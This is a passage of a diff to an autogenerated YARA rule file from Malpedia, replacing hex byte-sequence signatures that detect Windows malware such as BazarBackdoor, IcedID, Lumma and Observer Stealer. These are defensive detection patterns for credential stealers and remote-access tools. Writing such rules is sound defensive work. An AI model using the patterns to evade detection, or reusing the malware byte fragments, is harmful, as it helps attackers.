57 e8???????? 83c404 ff75f8 e8???????? 8bf8 } + $sequence_2 = { f7d9 0bc8 51 53 e8???????? ffb504e7ffff 8bd8 } + $sequence_3 = { 68???????? 50 ff5110 8b55b8 8b4dcc 2bd1 0f1f440000 } + $sequence_4 = { 6bd830 8b04bd78394200 f644032801 7444 837c0318ff 743d e8???????? } + $sequence_5 = { e8???????? 8b3d???????? 33db 0f1f8000000000 8d853cd4ffff 50 } + $sequence_6 = { 64a300000000 8bf1 89b5e4edffff 33c0 c785c0edffff00000000 } + $sequence_7 = { 6bce4c 53 0f100419 0f1100 e8???????? 8b4dfc 83c404 } + $sequence_8 = { 68???????? ffb5e0f9ffff ff15???????? f7d8 5e } + $sequence_9 = { dd00 ebc6 c745e0b8de4100 e9???????? c745e0c0de4100 e9???????? } condition: - 7 of them and filesize <832512 + 7 of them and filesize <327680 } -rule MALPEDIA_Win_Pittytiger_Rat_Auto : FILE +rule MALPEDIA_Win_Hermeticwizard_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9764afd8-8e4e-54dd-9ad2-bd1903f5455d" + id = "726bd88f-010b-5502-8637-f9d7bbeebd06" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pittytiger_rat_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwizard" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hermeticwizard_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "a2f2e591a5e3a3c37398ec723056984b2fa4039658f61ff9463c257a6584be3f" + logic_hash = "42607a1b485bdd595d314b574245aeda955efc5b6dd3f18356065a03173a4530" score = 75 quality = 75 tags = "FILE" @@ -141501,34 +144377,34 @@ rule MALPEDIA_Win_Pittytiger_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8175ec90b48f19 8175f0596f62d6 885df4 50 8d85d4ffffff } - $sequence_1 = { a3???????? 0f8451feffff 8d45b8 c745b84f70656e 50 57 } - $sequence_2 = { ab ab aa 8d7dc8 33c0 a5 } - $sequence_3 = { 397df8 7678 3bf7 7474 } - $sequence_4 = { 8bf8 83ffff 7512 ff15???????? } - $sequence_5 = { 3bc3 a3???????? 0f8476ffffff 8d459c c745ac65416500 50 } - $sequence_6 = { 7512 ff15???????? 50 53 } - $sequence_7 = { 50 895df8 ff7510 ff750c ff75fc } - $sequence_8 = { ff15???????? 85c0 741c 6a40 ff75f0 ffd7 6af1 } - $sequence_9 = { 8d85dcfdffff 50 8d85e0feffff 50 7407 68???????? eb05 } + $sequence_0 = { 8b4608 3b4208 eb31 83f803 7531 8d4a04 8d4604 } + $sequence_1 = { 33c9 66897dca 6800080000 50 } + $sequence_2 = { 8b35???????? ffd6 ff75e8 ffd6 5e 8b4508 5f } + $sequence_3 = { 6bc930 53 8b5d10 8b0485c0dd0110 56 } + $sequence_4 = { 6689854cffffff 6689854effffff 66898554ffffff 6689855effffff 66898d58ffffff 66898d5affffff 59 } + $sequence_5 = { 8d4608 50 8d4908 e8???????? } + $sequence_6 = { 6a02 58 668945e8 8b4104 } + $sequence_7 = { c3 837d08ff 0f8401070000 e9???????? e9???????? 55 8bec } + $sequence_8 = { ff15???????? 83f87a 7567 ff75fc 6a08 ff15???????? 50 } + $sequence_9 = { ff15???????? 85c0 7504 b001 eb3a 57 56 } condition: - 7 of them and filesize <2162688 + 7 of them and filesize <263168 } -rule MALPEDIA_Win_Bazarbackdoor_Auto : FILE +rule MALPEDIA_Win_Obscene_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5d2ecc0c-54dd-5654-9202-132113260f24" + id = "b0504e00-5509-5e10-82c6-a688a7937d0f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bazarbackdoor_auto.yar#L1-L638" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.obscene" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.obscene_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "bfaa99dbae5ad02f0954740ed30f16e2a148a8070db46fd5f787ce6fb0204c77" + logic_hash = "62960aba55b9b132d0d487c37c4dacdc8a915363f3251233103a943c3f791f18" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -141540,100 +144416,32 @@ rule MALPEDIA_Win_Bazarbackdoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488bce 4889442420 ff15???????? 85c0 780a } - $sequence_1 = { 488bce ffd0 eb03 488bc3 } - $sequence_2 = { b803000000 e9???????? 488b5568 4c8d85f0040000 488b4c2450 bb08000000 } - $sequence_3 = { e9???????? 488b4c2458 488d55e0 ff15???????? } - $sequence_4 = { 4533c0 c744242002000000 ba00000040 ffd0 } - $sequence_5 = { 0fb70f ff15???????? 0fb74f02 0fb7d8 ff15???????? } - $sequence_6 = { 488d4d80 e8???????? 498bd6 488d4d80 } - $sequence_7 = { 7507 33c0 e9???????? b8ff000000 } - $sequence_8 = { 0fb7d8 ff15???????? 0fb74f08 440fb7e8 } - $sequence_9 = { 4885c9 7406 488b11 ff5210 ff15???????? } - $sequence_10 = { e8???????? cc e8???????? cc 4053 4883ec20 b902000000 } - $sequence_11 = { c3 0fb74c0818 b80b010000 663bc8 } - $sequence_12 = { e8???????? 4c89e1 e8???????? 8b05???????? } - $sequence_13 = { 4533c9 4889442428 488d95a0070000 488d442470 41b80f100000 } - $sequence_14 = { 0fb6c9 4881e9c0000000 48c1e108 4803c8 8bc1 488d94059f070000 } - $sequence_15 = { 31ff 4889c1 31d2 4989f0 } - $sequence_16 = { 4889f1 e8???????? 8b05???????? 8b0d???????? } - $sequence_17 = { 4c89742440 4c89742438 4489742430 4c89742428 } - $sequence_18 = { ff15???????? 4889c1 31d2 4d89e0 } - $sequence_19 = { 418d5508 488bc8 ff15???????? 488bd8 } - $sequence_20 = { e8???????? 4889c7 8b05???????? 8b0d???????? } - $sequence_21 = { 488d9590050000 488bce ff15???????? 85c0 } - $sequence_22 = { 488d442470 41b80f100000 488bce 4889442420 } - $sequence_23 = { ff15???????? ff15???????? 4d8bc5 33d2 488bc8 } - $sequence_24 = { 0fafc8 89c8 83f0fe 85c8 0f95c0 0f94c3 } - $sequence_25 = { c744242003000000 4889f9 ba00000080 41b801000000 } - $sequence_26 = { c744242800000001 4533c9 4533c0 c744242002000000 ba1f000f00 } - $sequence_27 = { 83fe09 0f9fc2 83fe0a 0f9cc1 } - $sequence_28 = { 4889442428 488d95b0030000 488d4580 41b80f100000 } - $sequence_29 = { 4d8bc7 33d2 488bc8 ff15???????? ff15???????? } - $sequence_30 = { 08ca 80f201 7502 ebfe } - $sequence_31 = { 48c744243000000000 c744242880000000 c744242003000000 4889f9 } - $sequence_32 = { 0f94c3 83f809 0f9fc2 83f80a 0f9cc0 30d8 } - $sequence_33 = { 0fb65305 33c0 80f973 0f94c0 } - $sequence_34 = { 0f9fc1 83fa0a 0f9cc2 30da 08c1 80f101 08d1 } - $sequence_35 = { 7528 0fb64b04 0fb6d1 80f973 } - $sequence_36 = { 4889c1 31d2 4989f8 ff15???????? 4885c0 } - $sequence_37 = { ff15???????? 31ed 4889c1 31d2 4989d8 } - $sequence_38 = { 488bd3 e8???????? ff15???????? 4c8bc3 33d2 } - $sequence_39 = { 0fb6d1 80f973 7504 0fb65305 } - $sequence_40 = { 08c1 80f101 7502 ebfe } - $sequence_41 = { e8???????? 4889f9 4889f2 ffd0 } - $sequence_42 = { 0f9cc2 30da 7509 08c1 } - $sequence_43 = { 85da 0f94c3 83fd0a 0f9cc2 } - $sequence_44 = { 84d2 7405 80fa2e 750f } - $sequence_45 = { 4889c1 31d2 4d89e8 ff15???????? } - $sequence_46 = { 4889c1 31d2 4d89f8 ffd3 } - $sequence_47 = { e8???????? 4c897c2420 4889d9 89fa } - $sequence_48 = { 89f0 4883c450 5b 5f } - $sequence_49 = { 8d4833 ff15???????? c744242810000000 4533c9 } - $sequence_50 = { 6a00 56 ff15???????? 5f 5e 5d 8bc3 } - $sequence_51 = { 689c7d9d93 6a04 5a e8???????? 59 59 85c0 } - $sequence_52 = { 8d44244c 50 6a00 ff74243c 53 55 ff15???????? } - $sequence_53 = { 6685ff 0f849c000000 837c2460ff 0f858c000000 } - $sequence_54 = { 50 0fb745e8 50 68???????? e8???????? } - $sequence_55 = { 66890d???????? 0fb7ca ff15???????? b901000000 66c746020100 668906 } - $sequence_56 = { 7506 8b0e 894c2460 0fb7c0 } - $sequence_57 = { 8a842483030000 81fe80000000 760b 24f2 0c02 } - $sequence_58 = { 57 8d4101 6a0e 8bf0 5f 8a11 } - $sequence_59 = { 7406 6a35 ffd0 eb02 33c0 } - $sequence_60 = { ffd6 8d7001 56 6a08 ff15???????? 50 } - $sequence_61 = { 740d 33d2 83f902 0f95c2 83c224 } - $sequence_62 = { 0f95c2 83c224 eb05 ba29000000 } - $sequence_63 = { 660f73d801 660febd0 660f7ed0 84c0 } - $sequence_64 = { 750b 8ac1 2ac2 fec8 88041a } - $sequence_65 = { 8d4701 84c9 0f45c7 803a00 8bf8 } - $sequence_66 = { 6a00 6a00 50 8d4601 } - $sequence_67 = { c1f808 0fb6c0 50 0fb6c2 } - $sequence_68 = { 83c410 b800308804 6a00 50 } - $sequence_69 = { 81feff030000 733c 8a02 3cc0 721e 0fb6c8 } - $sequence_70 = { 89542410 48894c2408 4883ec48 8b442458 89442424 48c744242800000000 } - $sequence_71 = { 488b442430 488b8c2410010000 48894830 488b442430 488b8c2418010000 48894838 488b442430 } - $sequence_72 = { 488bca 448bc0 488bd1 488b4c2430 e8???????? 488b442428 } - $sequence_73 = { ff15???????? 33c0 eb47 488b442430 8b4014 } - $sequence_74 = { 4825ffff0000 488b8c2488000000 4c8b4140 488bd0 } - $sequence_75 = { 488b442430 48c7404800000000 488b442430 eb14 } - $sequence_76 = { eb1f 488b442430 8b4024 2580000000 } - $sequence_77 = { 488b442458 488b00 b908000000 486bc909 488d840888000000 4889442428 488b442428 } + $sequence_0 = { 6a06 68fc421010 ff35???????? 6aff ff15???????? ff7520 } + $sequence_1 = { 68e4401010 e8???????? 59 80a0e240101000 68e4401010 e8???????? 59 } + $sequence_2 = { 59 6820431010 68e4401010 e8???????? 59 59 85c0 } + $sequence_3 = { 0fbe00 83f809 7416 8b45fc 0fbe00 83f80d } + $sequence_4 = { 59 80a012109a0000 68???????? e8???????? } + $sequence_5 = { 50 e8???????? 59 68???????? 8d85ecf6ffff 50 } + $sequence_6 = { 8bec b8400d0300 e8???????? 68360d0300 ff7508 } + $sequence_7 = { 59 59 68c4501010 68d83f1010 6814110010 e8???????? } + $sequence_8 = { 0fbe00 83f82d 7409 8b45f8 40 8945f8 eb08 } + $sequence_9 = { 8365fc00 6a40 ff7508 ff15???????? 59 59 } condition: - 7 of them and filesize <2088960 + 7 of them and filesize <2170880 } -rule MALPEDIA_Win_Remcom_Auto : FILE +rule MALPEDIA_Win_Jlorat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a3eb8b2b-3833-5f4e-a476-a250aeb73992" + id = "eb5a0545-ab37-5e70-b9eb-6c48eb9adb8a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.remcom_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jlorat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jlorat_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "4f3e16a0ac97921c2fcb2fdd27863c94129d85212bc306f9915a79a291488cb1" + logic_hash = "c96d7ee2744d61897b682d97d67d56d29e38731c8c93cf3d00f8d6450ca3d2bf" score = 75 quality = 75 tags = "FILE" @@ -141647,32 +144455,32 @@ rule MALPEDIA_Win_Remcom_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8be5 5d c3 53 56 8d95f8feffff } - $sequence_1 = { 83c8ff 89463c 894638 894640 8b8708110000 50 8d9f0c110000 } - $sequence_2 = { e8???????? a1???????? 33c5 8945fc 56 8b7508 68???????? } - $sequence_3 = { 50 8d9f0c110000 53 68???????? 8d55e0 68???????? } - $sequence_4 = { 008891400023 d18a0688078a 46 018847018a46 } - $sequence_5 = { 52 ffd3 85c0 7507 ffd7 8945f0 eb78 } - $sequence_6 = { 6a00 6a01 8d4de0 51 ffd3 8d45f4 50 } - $sequence_7 = { 8d8e00100000 f7d8 1bc0 23c1 8d8de4feffff } - $sequence_8 = { 8b7508 8d34f528e54000 391e 7404 8bc7 } - $sequence_9 = { 6a00 51 ffd7 8b4638 6a00 50 ffd7 } + $sequence_0 = { e8???????? 83ec10 89c1 83c101 83d200 89542450 31c0 } + $sequence_1 = { f20f114620 c7464001000000 89e0 8d5620 895004 8908 e8???????? } + $sequence_2 = { f20f1086d8020000 f20f108ee0020000 f20f118e28030000 f20f118620030000 f20f108630030000 f20f118648030000 f20f108620030000 } + $sequence_3 = { f6861618000001 0f85c0160000 e9???????? 8b4510 8b08 89e0 894804 } + $sequence_4 = { eb00 e9???????? 8b559c 8b7580 8b7d84 8b5da4 8b4d88 } + $sequence_5 = { e8???????? 8945c8 eb00 8b4dc4 8b45c8 c645e300 8945cc } + $sequence_6 = { c745f0ffffffff 89e0 8d4dd8 8908 e8???????? 8b45c8 8b4de8 } + $sequence_7 = { f30f118424d8000000 eb43 8b4c2448 8b54244c 89e0 895004 8908 } + $sequence_8 = { e8???????? 894644 eb00 8b4e44 c601ff c64101ff c64102ff } + $sequence_9 = { eb09 8b4df4 83c101 894df4 837df40a 7302 ebef } condition: - 7 of them and filesize <155648 + 7 of them and filesize <10952704 } -rule MALPEDIA_Win_Netkey_Auto : FILE +rule MALPEDIA_Win_Underminer_Ek_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "76292b9d-6066-51f2-940c-21859c007253" + id = "2ed43350-f854-5062-8561-cad10f7ea1be" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netkey" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.netkey_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.underminer_ek" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.underminer_ek_auto.yar#L1-L176" license_url = "N/A" - logic_hash = "0ca26012e9d146d53c4ba2a355f1655827a5f40d6a52c39d2206e16c6e4d6ec5" + logic_hash = "39ca462c5e03509c03f5a77251b93a3d7053742d5a8b5f784c7649f495781800" score = 75 quality = 75 tags = "FILE" @@ -141686,32 +144494,38 @@ rule MALPEDIA_Win_Netkey_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c40c 83c208 8bca 81e11f000080 7905 49 } - $sequence_1 = { 83e03f c1ff06 6bd830 8b04bda8214400 f644032801 7444 837c0318ff } - $sequence_2 = { 81ec98010000 a1???????? 33c4 89842494010000 b9???????? e8???????? 8d0424 } - $sequence_3 = { 83c404 85ff 0f84c7000000 57 53 6a00 56 } - $sequence_4 = { 8bc2 8955fc 99 83e21f 8d0c02 c1f905 } - $sequence_5 = { 6a01 8845e8 8d45e8 57 50 c745c801000000 e8???????? } - $sequence_6 = { 42 668955ec e8???????? 99 be3b000000 f7fe } - $sequence_7 = { 780d b801000000 5f 5e 5b 59 } - $sequence_8 = { 83c8ff eb07 8b04cd8c6a4300 5f 5e 5b 8be5 } - $sequence_9 = { 8d8fd8000000 e8???????? 0f1005???????? 8d95f0fbffff 8d4a01 0f1185f0fbffff } + $sequence_0 = { 68d040fa7e 687853fa7e ff742418 ffd0 85c0 } + $sequence_1 = { 684c52fa7e 53 ff15???????? 8bf8 85ff 7476 } + $sequence_2 = { 1bc0 23c1 83c008 5d c3 8b04c5e48f4200 5d } + $sequence_3 = { 884d17 0f8482000000 f6451701 7445 8b4d10 } + $sequence_4 = { 68e452fa7e 53 e8???????? 68ef030000 8d4311 68d233fa7e 50 } + $sequence_5 = { 51 e8???????? 83c408 8b55dc c745f000000000 } + $sequence_6 = { 8b49fc 83c223 2bc1 83c0fc 83f81f 0f87b0130000 52 } + $sequence_7 = { f30f7e4110 660fd645f0 c7411000000000 c741140f000000 c60100 837df410 0f4345e0 } + $sequence_8 = { 8b4d0c c60102 ebe9 3cbf 770b } + $sequence_9 = { 0fb6d1 f604557aa3420001 740f 8b45f0 8b8094000000 } + $sequence_10 = { 8bdf 46 ff4d0c c1e010 0fbf16 03d8 8d841a00800000 } + $sequence_11 = { 8b34bd6cc64200 eb07 8b34bd38c64200 53 46 } + $sequence_12 = { 89451c 7548 803ee8 7559 8b4601 } + $sequence_13 = { 6a00 51 50 57 ff15???????? ff75d8 } + $sequence_14 = { 49 807dff00 8955ec 894df4 8b0485582c4300 } + $sequence_15 = { 5b c9 c3 ff742408 8b442408 ff10 c3 } condition: - 7 of them and filesize <606208 + 7 of them and filesize <466944 } -rule MALPEDIA_Win_Flying_Dutchman_Auto : FILE +rule MALPEDIA_Win_Webc2_Kt3_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bcfa70ed-52d3-5ff6-98d2-54bf0fdb6694" + id = "94855d65-b1ce-5b35-9456-d0939a525276" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flying_dutchman" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flying_dutchman_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_kt3_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "395092a50a0edc892d45a5d410470e4cbf5a35f346d3d2f6d581d10febaed0cd" + logic_hash = "a5c2b8d7a42ef74a9adf1d4cae6732c8a660cac1ccf5f008908f03c7dfba3cd1" score = 75 quality = 75 tags = "FILE" @@ -141725,32 +144539,32 @@ rule MALPEDIA_Win_Flying_Dutchman_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 66890c02 83c002 6685c9 75f1 e9???????? 8b85e8feffff 83e800 } - $sequence_1 = { 48 0f84f8000000 48 0f853d010000 83bd44fcffff06 7553 8b35???????? } - $sequence_2 = { 8bec 51 56 6a18 e8???????? 33f6 } - $sequence_3 = { 8d442430 50 89742438 895c2434 68???????? eb40 57 } - $sequence_4 = { ff75f0 f3a5 ff75f4 ff15???????? ff75f4 8b35???????? ffd6 } - $sequence_5 = { 3bfb 7531 6a14 e8???????? 8bf0 59 } - $sequence_6 = { ff15???????? 3bc7 7504 33c0 eb1f 0fbf480a } - $sequence_7 = { 0f8489000000 48 747f 2ddb030000 } - $sequence_8 = { e8???????? 8be5 5d c20800 55 8bec 81eca8000000 } - $sequence_9 = { 832600 83660400 83660800 c3 8b4b04 56 57 } + $sequence_0 = { 8a92c0c84000 089021d34000 40 3bc7 76f5 41 } + $sequence_1 = { ff15???????? 85c0 0f843a010000 83bdf0fbffff00 0f86a4000000 } + $sequence_2 = { 836dd001 837dd000 742c 836dd001 } + $sequence_3 = { 0345f8 c60000 8b4de8 51 ff15???????? 8b55e8 0fbe02 } + $sequence_4 = { 8955a8 66c745c80000 c745cc00000000 66c745ca0000 c745c401010000 8b4508 8945d0 } + $sequence_5 = { e8???????? 8945fc 837dfc00 7d05 83c8ff eb25 837dfc00 } + $sequence_6 = { 7527 8b55fc 0fbe4202 83f82d 751b } + $sequence_7 = { 51 ff15???????? 8945f0 837df000 7511 8b55f8 52 } + $sequence_8 = { 8b5508 83c234 83c9ff 33c0 } + $sequence_9 = { 8bec 83ec30 53 56 57 8b4508 8945e0 } condition: - 7 of them and filesize <276480 + 7 of them and filesize <114688 } -rule MALPEDIA_Win_Mapiget_Auto : FILE +rule MALPEDIA_Win_Gup_Proxy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "51e9978a-f3a2-5a57-b2db-e31705d960d6" + id = "5c3bfea3-920f-5316-9eb6-180474d2cca9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mapiget_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gup_proxy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gup_proxy_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "0c633dd4b3de0327e913721fdea6a98365647ad6509020036346423432ca814a" + logic_hash = "d81f0061756179ec05e7cc548d81d0721d972a5a55f0d637cdd705d25b38ea90" score = 75 quality = 75 tags = "FILE" @@ -141764,32 +144578,32 @@ rule MALPEDIA_Win_Mapiget_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 773c 33d2 8a9178154000 ff24956c154000 6683780400 } - $sequence_1 = { 75f4 8d0c49 5e 8d0c8dd8ea4000 3bc1 } - $sequence_2 = { 52 e8???????? 83c404 6683bc456effffff0a 7517 8d8570ffffff } - $sequence_3 = { 8d95f0f9ffff 6800020000 52 e8???????? 83c40c 85c0 0f84c1010000 } - $sequence_4 = { 741e 8bc7 8bcf c1f805 83e11f 8b048520174100 8d04c8 } - $sequence_5 = { e8???????? 8b54240c 83c408 52 } - $sequence_6 = { 8d85f0feffff 8d8d70ffffff 50 8d95f0fdffff } - $sequence_7 = { 85c0 7520 8d8df0f9ffff 8d95f0fdffff 51 52 } - $sequence_8 = { 83c404 3bf7 0f846bfdffff 56 } - $sequence_9 = { c705????????0d000000 c3 8b04d5540c4100 a3???????? c3 81f9bc000000 } + $sequence_0 = { c744244400000000 c644243400 e8???????? c784242002000000000000 8d4c2444 6a00 } + $sequence_1 = { c1e606 03348510974100 33db 395e08 } + $sequence_2 = { 8b04bd10974100 830c06ff 33c0 eb16 e8???????? c70009000000 } + $sequence_3 = { c1f805 c1e606 8b048510974100 80643004fd 8b45f8 8b55fc 5f } + $sequence_4 = { c78588feffffc22eab48 50 8bce e8???????? 8bc3 889d88feffff c1e818 } + $sequence_5 = { c3 b8???????? c705????????61984000 a3???????? c705????????f2984000 c705????????4c994000 c705????????d1994000 } + $sequence_6 = { c784242002000000000000 8d4c2444 6a00 68???????? c74424600f000000 c744245c00000000 c644244c00 } + $sequence_7 = { ebb4 c745e4d8a04100 a1???????? eb1a c745e4d4a04100 a1???????? } + $sequence_8 = { ff15???????? 8b04bd10974100 830c06ff 33c0 } + $sequence_9 = { 53 ff15???????? 83f8ff 752a 32c0 } condition: - 7 of them and filesize <163840 + 7 of them and filesize <247808 } -rule MALPEDIA_Win_Skip20_Auto : FILE +rule MALPEDIA_Win_Observer_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "82237026-0542-5063-b5ce-819de193cfa5" + id = "536559c4-9574-5591-915f-4694149d7210" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skip20" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.skip20_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.observer_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.observer_stealer_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "21de0ff5fbd1c6f42d6edbb2c240ff9a5cc9d69d730f1c14e8fabd969797a013" + logic_hash = "7a05fc963c0665c59a8fed1a8fc722896fb246e3248a23ceef5fd4c8486da3c7" score = 75 quality = 75 tags = "FILE" @@ -141803,32 +144617,32 @@ rule MALPEDIA_Win_Skip20_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c9 7448 ffc9 7432 ffc9 0f85150a0000 } - $sequence_1 = { 782e 3b0d???????? 7326 4863c9 488d1504fe0400 488bc1 } - $sequence_2 = { 0fb74c247a 0fb7542478 89442438 894c2430 89542428 488d15e62f0100 } - $sequence_3 = { 741c 3d00010000 740e 3d00020000 7536 4180493347 eb2f } - $sequence_4 = { e9???????? 4883bc24e000000000 7409 83fa01 0f842cf9ffff 83fa05 } - $sequence_5 = { 488db424ec000000 0f1f00 413bfc 732a 448b06 8bd7 } - $sequence_6 = { 418bb482a08a0100 eb07 4c8d15b4b2ffff 8bd6 81e200004000 747e 41ff4c2418 } - $sequence_7 = { 488d3d071f0500 ba58000000 488bcd e8???????? 4885c0 7468 } - $sequence_8 = { 89542428 488d15652f0100 440fb7442470 440fb74c2472 440fb7542476 4489542420 488d0db72f0100 } - $sequence_9 = { 89442438 0fb74c247a 894c2430 0fb7542478 89542428 488d15ae290100 } + $sequence_0 = { c1ea03 0fb60c02 8bc6 83e007 0fabc1 8b442414 } + $sequence_1 = { 8b5c2418 f6c301 746c 8b3e 85ff 7466 8b5e04 } + $sequence_2 = { 50 ff15???????? 8b4c2460 8d442440 50 e8???????? 8d4c2440 } + $sequence_3 = { e8???????? 68???????? 8d8d54ffffff e8???????? 68???????? 8d8d6cffffff } + $sequence_4 = { 59 eb3b 55 8b6b04 2bee c1fd02 56 } + $sequence_5 = { 85f6 740b 83feff 0f859a000000 eb6c 8b1c8d287e4300 } + $sequence_6 = { 8d8d60ffffff e8???????? 59 83781408 7202 8b00 } + $sequence_7 = { 8b442420 8918 5f 5e 5d 5b 83c40c } + $sequence_8 = { 85d2 7912 f7da e8???????? 6a2d 8d48fe 58 } + $sequence_9 = { 8d7c2468 894c2464 885c2450 ab ab ab ab } condition: - 7 of them and filesize <794624 + 7 of them and filesize <614400 } -rule MALPEDIA_Win_Lumma_Auto : FILE +rule MALPEDIA_Win_Icedid_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "00d0b80d-1d60-5a8c-ab53-b2e4e4ca8bb2" + id = "f1fe8329-9566-5f3c-8226-7a3fb9936918" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lumma_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.icedid_auto.yar#L1-L298" license_url = "N/A" - logic_hash = "5263a9e2f3da4148c4cca89d62ca2919f1c780d4176c9b4897b89aefc59def79" + logic_hash = "35bc9d0f5535131e0ac355ad775af24bc4cac838dad6434eced01ac7afcde501" score = 75 quality = 73 tags = "FILE" @@ -141842,35 +144656,54 @@ rule MALPEDIA_Win_Lumma_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 57 53 ff767c ff7678 } - $sequence_1 = { ffd0 83c40c 894648 85c0 } - $sequence_2 = { ff5130 83c410 85c0 7407 } - $sequence_3 = { ff7678 ff7644 ff563c 83c414 } - $sequence_4 = { ff770c ff37 ff7134 ff5130 } - $sequence_5 = { ff7608 ff7044 ff503c 83c414 } - $sequence_6 = { 894610 8b461c c1e002 50 } - $sequence_7 = { 833800 740a e8???????? 833822 } - $sequence_8 = { 83c40c 6a02 6804010000 e8???????? } - $sequence_9 = { 017e78 83567c00 017e68 83566c00 } - $sequence_10 = { 89e5 8b550c 6bd204 89d1 } - $sequence_11 = { 41 5d 41 5b 41 5c } - $sequence_12 = { 48 83ec28 0f05 48 83c428 49 } + $sequence_0 = { 85c0 7511 56 57 ff15???????? } + $sequence_1 = { 50 6801000080 ff15???????? eb13 } + $sequence_2 = { 803e00 7427 6a3b 56 ff15???????? 8bf8 } + $sequence_3 = { ff15???????? 85c0 7420 837c241000 7419 } + $sequence_4 = { 56 ff15???????? 8bf8 85ff 7418 c60700 } + $sequence_5 = { 68???????? 6a00 ff15???????? 33c0 40 } + $sequence_6 = { 50 ff15???????? 8bf7 8bc6 eb02 } + $sequence_7 = { eb0f 6a08 ff15???????? 50 ff15???????? 8906 } + $sequence_8 = { e8???????? 8bf0 8d45fc 50 ff75fc 6a05 } + $sequence_9 = { 743f 8d5808 0fb713 8954241c } + $sequence_10 = { 03c2 eb5c 8d5004 89542414 8b12 85d2 } + $sequence_11 = { 66c16c241c0c 0fb7d2 c744241000100000 663b542410 } + $sequence_12 = { 47 83c302 